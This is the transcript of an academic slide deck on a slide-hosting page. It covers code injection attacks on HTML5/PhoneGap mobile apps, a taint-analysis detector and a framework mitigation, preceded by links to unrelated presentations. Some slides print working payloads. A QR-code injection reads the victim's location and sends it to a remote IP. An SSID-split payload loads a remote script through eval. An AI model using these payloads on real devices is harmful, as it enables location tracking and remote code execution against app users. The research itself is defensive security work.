Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,

Slides:



Advertisements
Similar presentations
Code Injection Attacks on HTML5-based Mobile Apps
Advertisements

Mobile Application Development Keshav Bahadoor. Part 1 Cross Platform Web Applications.
Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.
D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,
Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.
Mobile Application Development
Development of mobile applications using PhoneGap and HTML 5
DYNAMIC DATA TAINTING AND ANALYSIS. Roadmap  Background  TaintDroid  JavaScript  Conclusion.
Introduction to Android Platform Overview
Native vs hybrid vs web mobile Application
The PhoneGap History Doncho Minkov Telerik Academy academy.telerik.com Technical Trainer
Intelligent Tutoring System Mobile Communication Team Drew Boatwright Nakul Dureja Richard Liou.
Common Alerting Protocol (CAP) Implementation Workshop – 2014 ArcGIS Geotrigger for CAP Implementation by Nalaka Kodippili Geo Technical Manager GIS Solutions.
Lightning Talk Fred Rodriguez Nguyen Do CPSC 473 May 6, 2012.
Three-tier Mobile Application Testing Framework:
Authors: William Enck The Pennsylvania State University Peter Gilbert Duke University Byung-Gon Chun Intel Labs Landon P. Cox Duke University Jaeyeon Jung.
Mobile App Support Jacob Poirier Geri Hengesbach Andrea Menke Erin Rossell.
Android Programming By Mohsen Biglari Android Programming, Part1: Introduction 1 Part1: Introduction By Mohsen Biglari.
Introduction CIS 136 Building Mobile Apps 1. What is a mobile app? 2  Computer program  Designed for small devices  Smartphones  Tablets  Other handhelds.
Take a leap towards the most promising technology
Java Mobile Apps with GWT & PhoneGap Josh Marinacci, webOS Developer Advocate.
Smart Phone Laboratory ECEN 489 Srinivas Shakkottai.
Developing Enterprise Mobile Apps with Xamarin Loren Horsager CEO, Mobile Composer.
HTML5 for Mobile Andrew Kinai. HTML vs HTML5 HTML:A language that describes documents' formatting and content, which is basically composed of static text.
AppShield: A Virtual File System in Enterprise Mobility Management Zhengyang Qu 1 Northwestern University, IL, US,
2011/12/20 1 Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin Syracuse University ACSAC 2011.
Mobile web Sebastian Lopienski IT Technical Forum 29 June 2012.
Behind Enemy Lines Administrative Web Application Attacks Rafael Dominguez Vega 12 th of March 2009.
Social Media Apps Programming Min-Yuh Day, Ph.D. Assistant Professor Department of Information Management Tamkang University
CROSS PLATFORM MOBILE APPLICATION DEVELOPMENT Nick Randolph (Built to Roam) SESSION CODE: DEV-WPH314 (c) 2011 Microsoft. All rights reserved.
The way of hybrid mobile development Hybrid Mobile Applications Telerik Software Academy
Title of Presentation DD/MM/YYYY © 2015 Skycure Why Are Hackers Winning the Mobile Malware Battle.
 Phone Gap is a mobile application development frame work based upon the open source apache cordova project. Developed by Nitobi software Bought by Adobe.
Javascript Static Code Analyzer
Enhancing Mobile Apps to Use Sensor Hubs without Programmer Effort Haichen Shen, Aruna Balasubramanian, Anthony LaMarca, David Wetherall 1.
Course Program, Evaluation, Exams Doncho Minkov Telerik Software Academy academy.telerik.com Senior Technical Trainer
Google Web Toolkit for Mobile Applications Development INGENUITY AT ITS BEST……………….
By Adam Reimel. Outline Introduction Platform Architecture Future Conclusion.
A method for using cloud computing for Android By: Collin Molnar.
丁建文 國立高雄應用科大資管系副教授 兼任計網中心軟體發展組組長 跨平台行動應用軟體開發技術 : HTML5 & Mobile JavaScript Framework 暨南大學.
JavaScript 사용현황 김민철. Table of contents  1. Mobile  WAC  PhoneGap  AppsPresso  2. TV  Samsung Smart TV  KT IPTV  3. 기타  node.js 2.
Android and IOS Permissions Why are they here and what do they want from me?
INTRODUCING HYBRID APP KAU with MICT PARK IT COMPANIES Supported by KOICA
AppAudit Effective Real-time Android Application Auditing Andrew Jeong
APP DESIGN AND DEVELOPMENT WITH THE IONIC FRAMEWORK Chuck Leone
#SummitNow Alfresco Mobile SDKs in Action 06 November, 2013 Mike Hatfield Lead Engineer Mobile Apps, Alfresco.
Phonegap API & Phonegap Bridge CIS 136 Building Mobile Apps 1.
LOGO Supervisor: Mr.Huỳnh Anh Dũng Students: Nguyễn Công Tuyến Nguyễn Cảnh Phương Phạm Thị Hằng Bùi Thị Huệ Trần Đức Bình Nguyễn.
TECH RELATED TOPIC PRESENTATION MICROPROCESSOR: CSE341 COURSE INSTRUCTOR DR. JIA UDDIN Assistant Professor Department of Computer Science and Engineering.
PhoneGap. web-based mobile development framework, based on the open-source Cordova project. use standard web technologies such as HTML5, CSS3, and JavaScript.
跨平台 Hybrid App 開發簡介 - 使用 Visual Studio Tool for Apache Cordova + HTML/JavaScript 陳葵懋 (Ian)
Mobile App Development Using:
A little more App Inventor and Mind the GAP!
Joshua Garcia Institute for Software Research
PhoneGap, Processing.
ET-570 Smart Phone Apps.
CHALLENGES IN FRONT OF MOBILE APPLICATIONS DEVELOPMENT
React Native Crash Course
Content Introduction Technology Used to Develop Mobile Application
Architecture of Android
Apache Cordova Overview
Automatic Mobile App Generation
Survey Paper & Manuscript
Who Am I? appMobi's lead HTML5 game developer / evangelist
Analyzing WebView Vulnerabilities in Android Applications
Mobile Pen Testing w/ drozer
Office 365 Development.
Apache Cordova What is it ? Platforms Development Architecture Plugins
Korea Software HRD Center
Introduce to Angular 6 Present by: Võ Văn Hào
Presentation transcript:

Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin, Gautam Nagesh Peri Department of Electrical Engineering & Computer Science Syracuse University

(a) (b) (c) (d) (e) (f) (g) (h)

News Covered

Outline HTML5-based Mobile App and Risk Code Injection Attacks on HTML5-based mobile apps Detection of Code Injection Attacks on HTML5-based mobile apps Mitigation of Code Injection Attacks on HTML5-based mobile apps Here is the outline of my presentation. First, I will give a overview of HTML5-based Mobile App and PhoneGap Architecture. PhoneGap is a popular middleware framework that can be used to develop HTML5-based mobile apps. We will also talk about the risks in JavaScript, which is the fundamental cause of the attack we have identified. Then I will talk about the attack by listing the channels and showing some examples. I will also show one of the real vulnerable app that we found in the android market. At last , I will list our future work

HTML5-based Mobile App and Risk

Cross Platform Application Development Windows Phone How Can I develop applications for all the platforms?

Overview of HTML5-based Mobile App Advantage: Can be easily ported between different platforms PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification … Disadvantage: Need to build the bridge between JavaScript and native resources

Overview of PhoneGap Architecture

Risks in HTML5-based Mobile App (JavaScript) Data and code can be mixed together. var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.

Code Injection Attacks on HTML5-based Mobile App

Cross-Site Scripting Attack (XSS)

Much broader attack surface Overview of our Attack Much broader attack surface

Condition1: Attack Channels NFC SMS MP3

Condition2: Display APIs(Triggering Code) In our sample set (15,510 apps), 93% of apps use at least one unsafe APIs/attributes at least one time

Vulnerable Code Example document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0, onSuccess, onError); } function onSuccess(result) { $("#display").html(result.text); function onError(contactError) { alert('onError!'); function unrealted() { alert(‘Unrelated functio’); Condition 1 (channel: barcode) Condition 2 (Vulnerable API:html)

Achieving Damage Directly Attack System Resources 2 Directly Attack System Resources Propagate to other Apps Propagate to other Devices 3 1

Real Vulnerable App Example Malicious QR code Vulnerable App (Android, iOS, Windows Phone) Being Traced

Real Vulnerable App Example The malicious code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m=’Latitude:’+loc.coords.latitude+ ’\n’+’Longitude:’+loc.coords.longitude; alert(m); b=document.createElement(’img’); b.src=’http://128.***.213.66:5556?c=’+m })> Use HTML5 Geolocation API to get Location Alert location information for demonstration purpose Real damage, send location information to remote server

Detection of Code Injection Attacks on HTML5-based Mobile App

Derive Data Flow Problem Data Retrieved Using PhoneGap API Source Vulnerable Display APIs Sink

Challenges C1: Mixture of application and framework code <html> <head> <script src= www.example.com/load.js/> </head> <body> <script> document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0,onSuccess, onError); } …… </script> </body> </html> C3 C1: Mixture of application and framework code C2: Difficulties in static analysis on JavaScript C3: Dynamic loaded content C2 C1

Framework Modeling Goal: connect data flow within PhoneGap Framework window = { plugins: { barcodeScanner:{ scan: function scan (mode,suc,err) { exec(suc, err, “scan”,[mode]); }}}} exec:function exec(suc,err,plugin,op,arg){ var dat = “fake”; suc(dat); err(dat); } Windows.plugins.barcodeScanner.scan(0, onSuccess, onError); Data Flow PhoneGap Framework Model Data Flow

Static Taint Analysis on Slice Goal: Accurate detect taint slice by backward slice from vulnerable APIs document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0,onSuccess, onError); } function onSuccess(result) { $("#display").html(result.text); function onError(contactError) { alert('onError!'); window.plugins.barcodeScanner.scan (Source) OnSuccess() .html() (Sink)

Evaluation Performance Accuracy 15,510 apps from the official Google Play Market Hardware spec: Intel Core i7-2600 3.4GHz with 16GB RAM. Performance Accuracy Average processing time : 15.38 sec/app 478/15,510 flagged as vulnerable False positive rate: 2.30% (because of dead code)

Case Study (The most powerful ones) Selected 20 apps (most powerful ones)

Other Static Analysis in Android Privilege escalation (Permission) Component Hijacking (Intent) SSL/TLS Stowaway Chex SMV-HUNTER Pscout Woodpecker ContentScope MalloDroid ComDroid AppSealer CryptoLint

Mitigation of Code Injection Attacks on HTML5-based Mobile App

Mitigation PhoneGap App PhoneGap Framework (Java) Plugins (Java) Camera Contact SMS Bridge Plugin Manager Filter (jsoup) JSMessage Queue WebView HTML5 CSS JavaScript addJavascript -interface R e s o u r c

WiFi Demo (SSID Length Limitation) <img src onerror=$.getScript('http://mu.gl')> (need to usejQuery) 32 SSID <img src onerror=a="$.getScr“> <img src onerror=b="ipt('ht”> Each SSID < 32 <img src onerror=c="tp://mu."> <img src onerror=d="gl')“> <img src onerror=eval(a+b+c+d)>

Demo (Video) www.cis.syr.edu/~wedu/android/JSCodeInjection/index.html

Conclusion Presented a systematic study of Code Injection Attacks on HTML5-based mobile Apps Designed and implemented a tool to automatic detect the vulnerabilities in HTML5-based mobile App Implemented a prototype (NoInjection) as a patch to the PhoneGap framework in Android to mitigate the attack

Thanks! Q & A Would you scan this?

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.